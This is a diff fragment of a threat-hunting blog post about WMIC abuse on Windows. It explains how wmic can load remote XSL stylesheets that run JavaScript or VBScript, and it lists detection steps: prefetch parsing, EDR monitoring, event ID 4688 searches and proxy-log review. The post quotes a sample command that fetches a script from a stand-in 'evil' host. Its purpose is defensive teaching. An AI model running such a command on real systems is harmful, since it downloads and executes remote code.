Th1ru-M/th1ru-m.github.io/_posts/2024-12-8-WindowsThreatHunting.md

 `wmic os get /FORMAT:"http://evil/evil[.]xsl"`
 XSL script (eXtensible Stylesheet Language).
 WMI can invoke javascript or VBscript using XSL

-`Detection`:
+<u>Detection:</u>
-1.WMIC.exe prefetch files and Parsing the prefetch will provide the downloaded file.
+- WMIC.exe prefetch files and Parsing the prefetch will provide the downloaded file.
-2.Command execution and arguments passed to wmic.exe using EDR solutions.
+- Command execution and arguments passed to wmic.exe using EDR solutions.
-3.Look for Windows event id 4688 and search the process command arguments with this utility names as a keyword along with below syntax
+- Look for Windows event id 4688 and search the process command arguments with this utility names as a keyword along with below syntax
 `wmic os get /FORMAT:"http:/"`
-4.Look for http request for file/page ending with XSL from proxy log or Network recorder.
+- Look for http request for file/page ending with XSL from proxy log or Network recorder.